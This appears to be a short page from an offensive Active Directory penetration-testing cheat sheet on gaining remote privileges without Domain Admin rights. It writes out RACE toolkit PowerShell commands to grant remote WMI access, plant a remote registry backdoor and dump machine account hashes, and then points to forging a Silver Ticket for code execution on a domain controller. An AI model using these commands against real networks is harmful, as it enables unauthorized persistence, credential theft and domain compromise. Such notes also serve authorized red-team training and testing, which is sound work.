description = ‘Allow remoting privileges on remote machines without being a Domain Admin.’
Remoting Privileges #
The following actions require us to have admin privileges over the remote machines.
I will research a way that this can be done with pure PowerShell (if possible), in the meantime I will put here how to do it with RACE toolkit.
Getting WMI #
We can execute WMI queries on remote computers if WMI is enabled and we have access to it.
If we don’t have access but we have administrator privileges on the machine, we can get access.
Set-RemoteWMI -SamAccountName <SamAccountName> -ComputerName <SamAccountName> -namespace 'root\cimv2' -Verbose
Getting Remote Registry #
Modify the permissions on the remote machine.
Add-RemoteRegBackdoor -ComputerName <FQDN of domain> -Trustee <SamAccountName>
-Verbose
This will also allow us to dump the machine account hash.
If executed against a Domain Controller or a Service Machine, we can then proceed to forge a Silver Ticket (TGS) and grant us code execution (on DC) or access to the hosted service.
Dump Machine Hash #
Get the machine account hash from the remote machine.
Get-RemoteMachineAccountHash -ComputerName <SamAccountName> -Verbose
Create Silver Ticket for code execution on DC #
See the Kerberos section